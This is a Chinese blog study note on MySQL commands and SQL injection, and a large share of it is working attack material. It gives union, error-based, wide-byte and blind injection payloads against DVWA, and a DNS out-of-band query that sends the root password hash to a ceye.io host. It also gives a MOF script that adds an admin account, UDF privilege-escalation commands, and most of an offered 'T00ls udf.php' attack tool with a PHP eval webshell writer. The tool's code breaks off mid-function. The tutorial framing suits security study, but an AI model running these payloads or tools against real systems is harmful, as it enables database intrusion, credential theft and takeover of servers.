ySQL小結
發表于 2020-09-21 分類于 知識整理 閱讀次數:
本文字數: 67k 閱讀時長 ≈ 1:01
Web程序代碼中對于用戶提交的參數未做過濾就直接放到SQL語句中執行,導致參數中的特殊字符打破了SQL語句原有邏輯,黑客可以利用該漏洞執行任意SQL語句。
MySQL安裝及配置
Mysql安裝(這里版本為8.0.17)
地址:https://dev.mysql.com/downloads/mysql/
將下載的mysql文件夾bin目錄加入環境變量���,D:\mysql\bin
首先執行mysqld --initialize-insecure(自動生成無密碼Root用戶)�,然后以管理員的權限執行CMD:mysqld install���,即可完成安裝。
net start mysql
net stop mysql
登陸MySQL及配置密碼
mysql -u root -p�,提示輸入密碼時候無需輸入���,回車即可�����。
ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'RootPwd@123456';
flush privileges;
查看是否支持遠程: select host ,user from user;
第一種:update user set host ='%' where user='root';
第二種:grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;
MySQL命令學習
select @@version查看當前MySQL版本
select user(); / select system_user();/select session_user();查看當前用戶
select database();查看當前數據庫
select connection_id();返回當前客戶的連接ID
select now()查看系統當前時間
select @@basedir;查看Mysql的安裝路徑
select @@datadir;查看數據庫安裝路徑
show databases;查看當前MySQL所有庫名
mysqldump -u root -p --default-character-set=UTF8 [database] [table] > dump.txtMysql導出位.txt
mysql -u root -p --default-character-set=UTF8 database_name < dump.txt導入
use <database_name>使用某個數據庫,需指定庫名
show tables;查看當前數據庫的數據庫表
select * from users; 查詢users表中所有的數據
select first_name from users;查詢users表中first_name字段的所有內容
select concat(user,0x3C,password) from users; concat連接字符串函數
select group_concat(user,0x3C,password) from users;將user,password字段所有內容連接成一個字符串
實踐:
select * from users limit m,n;查詢user表中數據�,輸出第m(代表下標�,下標都是從0開始)條開始的n條數據
select concat(user,0x3c,password) from users limit 3,2;將users表中user、password字段第四、五條數據用<號連接,輸出
select mid(user(),2,3);mid字符串截取�,截取當前用戶名第二個字符開始的三個字符
select substr(user(),2,3);subsets字符串截取����,截取當前用戶名第二個字符開始的三個字符
select ord(mid(database(),3,1));/select ord(substr(database(),3,1));查詢當前庫名的第三個字符的ASCII
select ascii('s');查詢s的ASCII值,同ord
select char(97);將ASCII值轉為字符串
select count(*) from users;查詢users表中數據條數
select length(user());查詢當前用戶名長度
select sleep(2);延時兩秒返回數據
select * from users order by user;根據字段名排序(拓展:order by 8執行正常,order by 9報錯�����,證明字段個數只有八個)
select password from users where user_id=2 or user_id=3;查詢users表中user_id為2和3的password字段的值
增刪改查
需要匹配users表中字段個數�,如果字段不匹配會報錯;如果字段內容限定為not NUll,字段為空時也報錯��。
insert into users values('9','test','test','test123','ssss','lujing','2019','2020');
update users set user='ccc' where password='ssss';將password為ssss的那條數據的user字段內容更新為ccc��;多條數據用逗號隔開 set user='ccc',user_id='20'
delete from users where user_id=9;刪除users表中user_id為9的那條數據
drop table users;刪除users表
drop database dvwa;刪除dvwa庫
Mysql數據去重
(找了半天�����,只能將查詢結果導入到另外一張表中了�。�����。��。)
- 利用distinct進結果去重,然后將查詢的結果導入到另外一張表中�。
insert ignore into user_info select distinct name,sex,id_card,tel,address,mail from users_room;
SQL注入可能用到的語法
基礎:
首先判斷頁面正常返回��。
然后select user,password from users where user_id=2 and 1=1;正確執行(and兩邊表達式均成立,返回為真)頁面正常返回
select user,password from users where user_id=2 and 1=2;返回為空(and兩邊表達式一真一假����,返回為假)頁面返回錯誤或者不正常
即可證明SQL存在
OR同理—>
select user,password from users where user_id=2 or 1=1;返回所有user和password的內容(or兩邊表達式都為真且1=1恒成立��,則返回所有)
select user,password from users where user_id=2 or 1=2;僅返回一條數據(1=2不成立,因此只返回user_id=2的那條數據指定的內容)
注意:and 1=1 并非絕對�,只要是表達式���,類似于’s’=’s’等等����,,����,,
判斷SQL注入存在,需要三個頁面對比才行�。
select user, password from users where user_id='2';如果源于句�����,使用了引號將ID值擴起來,需要構造如下:where user_id='2' and '1'='1,也即是2' and '1'='1,2' and '1'='2
同理�����,如果使用雙引號�����,括號擴起來的��,也需要按照上面的情況��。(如果where user_id=('1')這樣呢?)
試一試:2',2''?
就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串��,最終達到欺騙服務器執行惡意的SQL命令�����。
高級查詢語法
select * from users order by last_name;查詢users表中的所有數據�,并使用last_name字段內容排序(根據的是ASXCII碼)
可以利用select * from users order by N;判斷users表字段個數�����,N小于等于字段數正常返回數據�,大于則報錯����。
-- -,#在數據庫中表示注釋之后的內容,/**/表示多行注釋,注釋掉擴起來的內容
select * from users order by last_name#asdasdas;
select * from users order by last_name-- -asadasdas;
多行注釋也可以用于行內:select * from users/**/order/*ssssss*/by last_name;
其他幾個排序:
降序排列查詢結果:select * from users DESC;
升序(默認排序):select * from users ASC;
一個查詢中從不同的表返回結果數據
在一個表中執行多個查詢���,按一個查詢返回數據
select user, password from users where user_id='2' union select last_name, first_name from users where user_id='4'
查詢user_id=2的use,password字段內容�,查詢user_id=4的last_name,first_name字段的值,一起返回(也即是同時返回����。�。����。)
關鍵詞like,通配符%,*,.等,常用的正則規則字符�����。
select * from users where avatar like '%hac%'匹配users表中avatar字段中含有hac的內容
“*“表示匹配零個或多個在它前面的東西����。例如,”D*“匹配任何數量的”D”字符
“.“ 匹配任何單個的字符。
當使用正則匹配時,使用REGEXP和NOT REGEXP操作符(或RLIKE和NOT RLIKE���,功能是一樣的)
select * from users where avatar like '%hac%' union select password from users;首先查詢avatar字段中包含hac的數據,然后查詢users表中的password字段內容,然后組合起來返回(會去重)
select user_id from users union select password from users;正常執行(組合查詢時候��,前后查詢的字段數要一樣�,這樣就是錯誤的:select user_id from users union select password,user from users;)
SQL注入示例
題目:where user_id=2處存在注入點,要求判斷注入點并查詢到user,password字段內容。
源于句:select user_id from users where user_id=2;
解:
- select user_id from users where user_id=2 and 1=1-- -;正常
- select user_id from users where user_id=2 and 1=2-- -;不正常,結合起來判斷存在注入點
- select user_id from users where user_id=2 order by 1-- -;正常
- select user_id from users where user_id=2 order by 2-- -錯誤,證明只有一個字段(在使用的user_id)
- select user_id from users where user_id=2 union select 1-- - 1為占位符�,填充使用
- select user_id from users where user_id=2 union select database()-- -替換占位符���,可以查詢一些常用信息(版本���,數據庫名����,用戶名����,路徑等)
- select user_id from users where user_id=2 union select concat(user,0x3c,password) from users-- -(使用concat連接user,password一起輸出����,就不用連續使用union select)
Mysql系統表利用
infomation_schema說明
MySQL中,把 information_schema 看作是一個數據庫����,確切說是信息數據庫���。其中保存著關于MySQL服務器所維護的所有其他數據庫的信息�。如數據庫名��,數據庫的表��,表欄的數據類型與訪問權 限等。在INFORMATION_SCHEMA中�����,有數個只讀表。它們實際上是視圖���,而不是基本表,因此��,你將無法看到與之相關的任何文件�����。
information_schema數據庫表說明:
- SCHEMATA表:提供了當前mysql實例中所有數據庫的信息�。是show databases的結果取之此表��。
- TABLES表:提供了關于數據庫中的表的信息(包括視圖)。詳細表述了某個表屬于哪個schema�����,表類型��,表引擎�����,創建時間等信息。是show tables from schemaname的結果取之此表����。
- COLUMNS表:提供了表中的列信息�。詳細表述了某張表的所有列以及每個列的信息��。是show columns from schemaname.tablename的結果取之此表���。
- STATISTICS表:提供了關于表索引的信息�����。是show index from schemaname.tablename的結果取之此表。
- USER_PRIVILEGES(用戶權限)表:給出了關于全程權限的信息����。該信息源自mysql.user授權表��。是非標準表。
- SCHEMA_PRIVILEGES(方案權限)表:給出了關于方案(數據庫)權限的信息��。該信息來自mysql.db授權表�����。是非標準表。
- TABLE_PRIVILEGES(表權限)表:給出了關于表權限的信息�����。該信息源自mysql.tables_priv授權表�����。是非標準表���。
- COLUMN_PRIVILEGES(列權限)表:給出了關于列權限的信息�。該信息源自mysql.columns_priv授權表��。是非標準表��。
- CHARACTER_SETS(字符集)表:提供了mysql實例可用字符集的信息。是SHOW CHARACTER SET結果集取之此表。
- COLLATIONS表:提供了關于各字符集的對照信息��。
- COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校對的字符集��。這些列等效于SHOW COLLATION的前兩個顯示字段�����。
- TABLE_CONSTRAINTS表:描述了存在約束的表。以及表的約束類型。
- KEY_COLUMN_USAGE表:描述了具有約束的鍵列。
- ROUTINES表:提供了關于存儲子程序(存儲程序和函數)的信息�。此時����,ROUTINES表不包含自定義函數(UDF)。名為“mysql.proc name”的列指明了對應于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列����。
- VIEWS表:給出了關于數據庫中的視圖的信息����。需要有show views權限���,否則無法查看視圖信息���。
- TRIGGERS表:提供了關于觸發程序的信息��。必須有super權限才能查看該表
https://blog.csdn.net/demonson/article/details/80388677(MySQL information_schema 詳解)
information_schema使用示例
1
| select 1,table_name from information_schema.tables where table_schema=(數據庫名十六進制) limit 2,1-- - # 當前數據庫所有表,使用limit n,1 逐條輸出。
|
1
| (select count(table_name) from information_schema.tables where table_schema =database())=2-- - # 判斷表的數量為2
|
1
| select 1,column_name from information_schema.columns where table_name=0x7573657273 limit 1,1-- -
|
1
| length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1)=10-- -
|
1
| length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1))=10-- -
|
MySQL注入基礎
常用系統函數
1
2
3
4
5
6
7
8
9
10
11
| 示例:select database();查詢當前數據庫名稱
? 1.system_user() 系統用戶名
? 2.user() 用戶名
? 3.current_user() 當前用戶名
? 4.session_user() 鏈接數據庫的用戶名
? 5.database() 數據庫庫名
? 6.version() mysql 數據庫版本信息
? 7.load_file() 轉換成16 或10 進制 讀取本地文件
? 8.@@datadir 讀取數據庫路徑
? 9.@@basedir MYSQL 安裝路徑
? 10.@@version_compile_os
|
常用關鍵字/函數
1
2
3
4
5
6
7
8
9
| limit m,n # 從m開始檢索n條數據
select mid(database(),2,1) # 用于得到當前數據庫名的第二個字符
select ord(mid(user(),1,1))= 114 # ord函數返回字符串第一個字符的 ASCII 值。
select concat(1,0x3c,2) # 將字符串1和2用<連接起來 輸出為:1<2
select sleep(2) # 結果在兩秒鐘后返回,可理解為暫停2秒
select length(user()) # 當前用戶名長度 length() 長度函數
select substr(user(),2,1) # 從第二個字符開始截取一個字符長度,這里為o
IF(expr1,expr2,expr3) # expr1 是TRUE則IF()的返回值為expr2; 否則返回值則為 expr3
select count(user) from users # 查詢users表中user字段所有數據的 個數
|
系統表簡介
Information_schema數據庫是MySQL自帶的,它提供了訪問數據庫元數據的方式����。什么是元數據呢��?元數據是關于數據的數據,如數據庫名或表名,列的數據類型,或訪問權限等�����。有些時候用于表述該信息的其他術語包括“數據詞典”和“系統目錄”���。
該庫有多個表其中保存著關于MySQL服務器所維護的所有其他數據庫的信息��。如數據庫名��,數據庫的表,表欄的數據類型與訪問權限等����。
更多介紹:https://blog.csdn.net/Touatou/article/details/80775601
顯性注入
經過在線DVWA http://43.247.91.228:81測試(介紹基礎��,所以選擇Low級別),在線的級別調不好,請本地搭建���。
源碼:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| <?php
if(isset($_GET['Submit'])){
// Retrieve data
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num = mysql_numrows($result);
$i = 0;
while ($i < $num) {
$first = mysql_result($result,$i,"first_name");
$last = mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
}
?>
|
重點看源碼中:SELECT first_name, last_name FROM users WHERE user_id = '$id'
漏洞產生原因:SQL語句未經過處理,直接將傳入的$id當做參數執行。(這里不進行 or 1=1之類的測試)
構造語句進行解釋:user_id='$id',如果傳入的$id值為1' order by 5-- -����,源語句變成了:
user_id='1’ order by 5-- -',在數據庫中是可以正常執行的��。
當num為2時���, 也就是user_id='1’ order by 2-- -正常執行��,為3時報錯����,說明當前庫的users表有兩個字段���。
開始注入
這里數據庫版本大于5.0�����,測試的是字符型���,因此是 ‘ and ‘1’=’1’��,省略 1’
這里并非直接獲取密碼啊,什么的�����,僅僅展示可能用到了的語句�。
1
2
3
4
5
6
7
8
| order by 2-- - # 獲取當前數據庫����,所使用表的字段長度����,-- - 表示注釋之后的內容
and '1'='1' union select 1,2-- - # 匹配字段
and '1'='2' union select 1,2-- - # 爆字段位置�,也即是可用字段,這里都可以
# 這時候就可以使用mysql系統函數來測試�。
and '1'='1' union select 1,ord(mid(user(),1,1))=114-- -# 正常返回證明當前數據庫用戶為r開頭一般為root.
and '1'='1' union select 1,ord(mid(user(),2,1))=111-- -# 正常返回證明當前數據庫用戶第二個字符為o
...
|
1
2
3
4
5
| 獲取表名源語句:
and '1'='1' union select 1,table_name from information_schema.tables where table_schema=(數據庫名十六進制) limit 2,1-- - # 當前數據庫所有表��,使用limit n,1 逐條輸出。
注入語句:
and '1'='1' union select 1,table_name from information_schema.tables where table_schema=0x64767761 limit 2,1-- -
|
1
2
| 原理同獲取表名�����。
and '1'='1' union select 1,column_name from information_schema.columns where table_name=0x7573657273 limit 1,1-- -
|
1
2
3
4
5
6
7
8
9
10
| # 已經爆出表名和字段名�����,直接查詢即可
and '1'='1' union select user,password from users-- -
# 上語句有兩個可用注入字段���,如果只有一個呢����?
# 第一種方式����,挨個爆,先爆名字����,再爆密碼
and '1'='1' union select 1,user from users-- -
# 第二種方式�,使用concat函數將字符串連接起來
and '1'='1' union select 1,concat(user,0x3c,password) from users-- -
# `0x3c`為`<`,這里將user�、password用`<`連接起來。輸出格式為:pablo<0d107d09f5bbe40cade3de5c71e9e9b7
|
至此��,已經爆出數據庫中可用的賬號密碼����,非root。類似于XXX系統的用戶/管理員賬號密碼�����。脫褲子的話請繞行- -
MySQL函數報錯
Floor
當使用 floor�����,rand,group by 連用時候會報錯。利用報錯,使用concat連接�����,可以實現注入�����。
1
2
3
4
5
6
7
8
9
10
11
12
| select concat(floor(rand(0)*2), '===='),count(1) from users group by user_id;
輸出:
+----------------------------------+----------+
| concat(floor(rand(0)*2), '====') | count(1) |
+----------------------------------+----------+
| 0==== | 1 |
| 1==== | 1 |
| 1==== | 1 |
| 0==== | 1 |
| 1==== | 1 |
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| select concat(floor(rand(0)*2), '====',(select user())),count(1) from users group by user_id;
輸出:
+--------------------------------------------------+----------+
| concat(floor(rand(0)*2), '====',(select user())) | count(1) |
+--------------------------------------------------+----------+
| 0====root@localhost | 1 |
| 1====root@localhost | 1 |
| 1====root@localhost | 1 |
| 0====root@localhost | 1 |
| 1====root@localhost | 1 |
+--------------------------------------------------+----------+
|
updatexml
1
2
| updatexml() //5.1.5
and 1=(updatexml(1,concat(0x3a,(select user())),1))
|
1
2
3
4
5
| select * from users where user_id=1 and 1=(updatexml(1,concat(0x3a,(select database())),1));
報錯:
ERROR 1105 (HY000): XPATH syntax error: ':dvwa'
|
1
2
3
4
5
| select * from users where user_id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
報錯:
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
|
extractvalue
1
2
3
4
5
6
| extractvalue() //5.1.5
and extractvalue(1,concat(0x5c,(select user())))
select * from users where user_id=1 and extractvalue(1,concat(0x3a,(select database())));
ERROR 1105 (HY000): XPATH syntax error: ':dvwa'
|
exp
1
2
3
| exp() //5.5.5版本之后可以使用
select host from user where user = 'root' and Exp(~(select * from (select version())a));
|
name_const
1
2
3
| name_const //支持老版本
select * from (select NAME_CONST(version(),0),NAME_CONST(version(),0))x;
|
幾何函數
1
2
3
| geometrycollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring()
select multipoint((select * from (select * from (select * from (select version())a)b)c));
|
寬字節
參考:
- https://xz.aliyun.com/t/3992#toc-3
MYSQL client鏈接編碼的鍋
1
| show variables like '%character%'
|
由于編碼不一致����,導致的問題�,主要是漢字占用了3個字節。關鍵字%df,當客戶端連接編碼設置為GBK的時候 與php進行交互的時候就會出現字符轉換 導致單引號逃逸的問題���。
測試payload: index.php?id=%df%27
MYSQL iconv函數 mb_convert_encoding函數的鍋
借用先知: $id =iconv('GBK','UTF-8', $id)
%df%27===(addslashes)===>%df%5c%27===(iconv)===>%e5%5c%5c%27
其實就是 utf8 -> gbk ->utf-8 低位的%5c 也就是反斜杠干掉了轉義單引號的反斜杠。
Big5編碼導致的寬字節注入
猜測代碼: iconv('utf-8','BIG5',$_GET['id'])
payload構造同上: 功’ -> addsalshes -> 功' -> iconv -> %A5%5C%5C%27->¥' 逃逸單引號
%E8%B1%B9'
SQL盲注
這里包含了Bool和Time類型
開始注入
本地搭建的DVWA,在線的顯性注入出了點問題����,就本地搭建了���。
這里測試使用了=號�,為了直觀�,真實環境協同使用<、>快速判斷
仔細觀察通過長度和返回時間兩種方式,下文對時間的不過多說了
1
2
3
4
5
| # 第一種,通過長度
and length(database())=4-- - # 正常返回 說明當前用戶名長度為 14 ����,我這里是:root@localhost
# 第二種通過返回時間判斷����,如果網絡較差��,建議多設置幾秒。
and if(length(database())=4,sleep(5),1)-- - # 如果數據庫名長度為4則延時5秒返回結果
|
1
2
3
4
5
6
| # 只能挨個字符判斷,這里值猜不到數據庫名的情況下�����,挨個字符判斷
# 第一種,通過ASCII值判斷��,判斷正確返回正常頁面�����,
and ascii(substr(database(),1,1))=100-- - # 第1個字符開始�����,1為截取字符長度
# 第二種,通過返回時間
and if(ascii(substr(database(),1,1))=100,sleep(3),1)-- -
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| # 猜表的數量,因為不知道數據庫結構��,只能慢慢猜�,這個根據自己需求,非必須
and (select count(table_name) from information_schema.tables where table_schema =database())=2-- - # 判斷表的數量為2
# 基于返回時間
and if((select count(table_name) from information_schema.tables where table_schema =database())=2, sleep(3),1)-- -
# 猜表名的長度,這里注意是length((exp1))=9,用括號將查詢內容括起來
and length((select table_name from information_schema.tables where table_schema =database() limit 0,1))=9-- -
# 通過limit 1,1遍歷表名長度, limit n,1 n從0開始��,0表示第一個表
# 基于時間的不在寫了���。
# 猜第一個表的第一個字母��,這里substr((exp1),1,1)=103,用括號將查詢內容括起來
and ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 0,1),1,1))=103-- -
# 上語句簡析:ascii( substr(exp1,1,1) )=103
# exp1 = select table_name from information_schema.tables where table_schema =database() limit 0,1
# 基于時間的不再寫了���。
|
通過limit控制查詢的表��,通過substr截取表名字符串,挨個判斷值
原理和判斷表名一樣
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| # 首先來個嵌套的����,這里不用獲取表名,可以直接得到字段長度�����、值��。
# 這里獲取的是第一個表的第一個字段的長度
# 通過第二個limit來控制查詢字段���。
and length((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1))=10-- -
# 第二種��,根據前面的表名,使用如下語句�,十六進制數據為:表名的十六進制����。
and length((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1))=10-- -
# 基于時間的就不再寫了��。也就是 if(length()=2,sleep(2),1)這種
# 求值第一個表的第一個字段的第一個字母
and ascii(substr((select column_name from information_schema.columns where table_name=0x6775657374626F6F6B limit 0,1),1,1))=99-- -
# 嵌套求第一個表的第一個字段的第一個字母
and ascii(substr((select column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema =database() limit 0,1)limit 0,1),1,1))=99-- -
|
1
2
3
4
5
6
7
| # 其實有了表名和字段名����,可以直接查詢的��。先獲取長度再獲取值���。
and length((select comment_id from guestbook))=1-- -
# 獲取值
and ascii(substr((select comment_id from guestbook),1,1))=49-- -
# 基于時間的
and if(ascii(substr((select comment_id from guestbook),1,1))=49,sleep(3),1)-- -
|
到此����,盲注的基本方法已經完成
DNSLOG
有時候注入發現并沒有回顯���,也不能利用時間盲注�,那么就可以利用帶外通道,也就是利用其他協議或者渠道����,如http請求、DNS解析、SMB服務等將數據帶出����。
1
2
3
4
| SELECT LOAD_FILE(CONCAT('\\\\',( SELECT DATABASE() ),'.xx.xx\\x));
# ceye
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.xxx.ceye.io\\abc'));
|
條件:
- mysql.ini 中 secure_file_priv 必須為空
mysql 新版本下secure-file-priv字段 : secure-file-priv參數是用來限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()傳到哪個指定目錄的��。
1
2
3
4
5
| 當secure_file_priv的值為null ,表示限制mysqld 不允許導入|導出
當secure_file_priv的值為/tmp/ ����,表示限制mysqld 的導入|導出只能發生在/tmp/目錄下
當secure_file_priv的值沒有具體值時��,表示不對mysqld 的導入|導出做限制
|
- 從payload看出load_file的路徑是windows下的UNC路徑�����,所以mysql帶外注入只能發生在windows機器上
MySQL提權
SQLMap+MSF
已知用戶名密碼情況下,利用Sqlmap結合MSF進行提權��。(需要對目錄有寫權限)
1
| sqlmap -d mysql://admin:123456@10.52.95.209:3306/mysql --os-pwn --msf-path /opt/metasploit-framework/
|
MOF提權
簡介:mof是windows系統的一個文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做”托管對象格式”其作用是每隔五秒就會去監控進程創建和死亡�����。其就是用又了mysql的root權限了以后�����,然后使用root權限去執行我們上傳的mof。隔了一定時間以后這個mof就會被執行����,這個mof當中有一段是vbs腳本�,這個vbs大多數的是cmd的添加管理員用戶的命令�。
必備命令
所需要的SQL語句select load_file('D:\wamp\xishaonian.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
必備腳本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| # pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
|
UDF提權
這里的前提是已經上傳了udf.dll,如果沒有寫入權限,emmm,,,我不肥了��。��。
注意事項:
- mysql<5.2版本的將.dll文件導入到c:\windows 或者c:\windows\system32 目錄下。
- mysql>5.2版本的將.dll文件導入到/MySQL/lib/plugin/ mysql安裝目錄下�。
- 如果報錯內容為:The MySQL server is running with the --secure-file-priv option so it cannot execute this statemen請在MySQL配置文件my.ini文件的[mysqld]選項內加入secure_file_priv =然后重啟mysql服務����。���。
- 如果報錯--secure-file-priv 又無法修改my.ini����,則沒有辦法。
詳情參考:--secure-file-priv 特性
手動UDF提權
制作udf.dll
SQLMAP下路徑:
1
2
3
4
5
| /usr/local/Cellar/sqlmap/1.4.3/libexec/data/udf/mysql/windows/64
/usr/local/Cellar/sqlmap/1.4.3/libexec/extra/cloak
python2 cloak.py -d -i lib_mysqludf_sys.dll_
# 即可在當前目錄下生成 lib_mysqludf_sys.dll
|
利用 1
- 查看plugin目錄show variables like '%plugin%';
提示:由于MySQL>5.2版本后,在其安裝目錄的lib目錄下沒有 plugin 目錄��,所以�,我們得新建這個目錄,并且將我們的 udf.dll 文件放入 plugin目錄下,我們執行下面命令,使用NTFS ADS流創建 plugin
1
| select 'xxxxxx' into dumpfile 'C:\\Program\ Files\\MySQL\\MySQL\ Server\ 5.4\\lib\\plugin::$INDEX_ALLOCATION'
|
- 導出UDF(也即是將之前生成的lib_mysqludf_sys.dll上傳到目標文件夾)
- 創建函數:CREATE FUNCTION shell RETURNS STRING SONAME 'lib_mysqludf_sys.dll'
注意:如果創建函數時報錯��,請根據lib_mysqludf_sys.dll中的函數創建�。
利用2
利用交互式的SHELL,mysql -uroot -pxxx無法繼續交互,需要參數e解決這個問題�����。
1
2
3
4
5
6
| mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"
mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values
(hex(load_file('C:\\xxxx\\xxxx.dll')));"
mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\xxxx.dll';"
mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'"
mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"
|
如沒有指定database��,將會出現錯誤����,而使用UNION,將不會有回顯�,一定出現問
題���,將會很難定位����,故選擇以mysql.x的方式指定。
1
2
3
4
5
6
7
| mysql -uroot -pXXXXXX -e "create table mysql.a (cmd LONGBLOB);"
mysql -uroot -pXXXXXX -e "insert into mysql.a (cmd) values
(hex(load_file('D:\\XXXXXXXXXX\\mysql5\\lib\\plugin\\u.dll')));"
mysql -uroot -pXXXXXX -e "SELECT unhex(cmd) FROM mysql.a INTO DUMPFILE
'D:/XXXXXXXXXX/mysql5/lib/plugin/uu.dll';"
mysql -uroot -pXXXXXX -e "CREATE FUNCTION shell RETURNS STRING SONAME 'uu.dll'"
mysql -uroot -pXXXXXX -e "select shell('cmd','whoami');"
|
UDF提權大馬
可以使用T00ls udf.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
| <?php
//t00ls...................
session_start();?>
<html>
<head>
<title>T00ls UDF.PHP</title>
<style type="text/css">
input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
</style>
<script type="text/javascript">
function outfile(){
document.getElementById("sql2").value= unescape("select%20%27%3C%3Fphp%20eval%28%24_POST%5B%5C%27pass%5C%27%5D%29%3F%3E%27%20into%20outfile%20%27d%3A%5C%5Cninty.php%27");
}
function loadfile(){
document.getElementById("sql2").value = unescape("select%20load_file%28%27c%3A%5C%5Cboot.ini%27%29");
}
</script>
</head>
<body>
<?php
error_reporting(0);
if (isset($_REQUEST['action']))
$action = $_REQUEST['action'];
else
$action = 'vConn';
switch ($action) {
case 'vConn':
vConn();
break;
case 'conn':
conn();
break;
case 'exec':
execsql();
break;
case 'install':
install();
break;
case 'copy':
cp();
break;
case 'cplug':
cplug();
break;
case 'logout':
logout();
break;
case 'func':
func();
break;
}
function vConn() {
echo 'by ninty http://www.t00ls.net/<form action="" method="post"><table><input type="hidden" name="action" value="conn">
<tr><td>ip:</td><td><input type="text" name="host" value="localhost"></td></tr><tr><td>uid:</td><td><input type="text" value="root" name="uid"></td></tr><tr><td>pwd:</td><td><input type="text" name="pwd"></td></tr><tr><td>db:</td><td><input type="text" name="db" value="mysql"></td></tr><tr><td><input type="submit"/></td><td> </td></tr></table></form>';
}
function func(){
$conn = conn(false);
mysql_select_db('mysql',$conn);
mysql_query('CREATE TABLE `func` ( `name` char(64) collate utf8_bin NOT NULL default \'\', `ret` tinyint(1) NOT NULL default \'0\', `dl` char(128) collate utf8_bin NOT NULL default \'\', `type` enum(\'function\',\'aggregate\') character set utf8 NOT NULL, PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT=\'User defined functions\'');
if (mysql_errno($conn) != 0) {
echo mysql_error() . '<br/>';
}
echo 'Create mysql.func success !';
mysql_close($conn);
}
function conn($close = true) {
if (isset($_SESSION['host'])) {
$host = $_SESSION['host'];
$uid = $_SESSION['uid'];
$pwd = $_SESSION['pwd'];
$db = $_SESSION['db'];
} else {
$host = $_POST['host'];
$uid = $_POST['uid'];
$pwd = $_POST['pwd'];
$db = $_POST['db'];
}
$conn = mysql_connect($host,$uid,$pwd);
if (!$conn) {
echo mysql_error().'<br/>';
vConn();
exit();
}
mysql_select_db($db,$conn);
if (mysql_errno($conn) != 0) {
echo mysql_error().'<br/>';
vConn();
exit();
}
$_SESSION['host'] = $host;
$_SESSION['uid'] = $uid;
$_SESSION['pwd'] = $pwd;
$_SESSION['db'] = $db;
//mysql_query('set names utf8');
showM($conn,$close);
return $conn;
}
function logout(){
unset($_SESSION['host']);
unset($_SESSION['uid']);
unset($_SESSION['pwd']);
unset($_SESSION['db']);
unset($_SESSION['notsame']);
unset($_SESSION['over51']);
unset($_SESSION['plugindir']);
$url = $_SERVER['PHP_SELF'];
$filename = end(explode('/',$url));
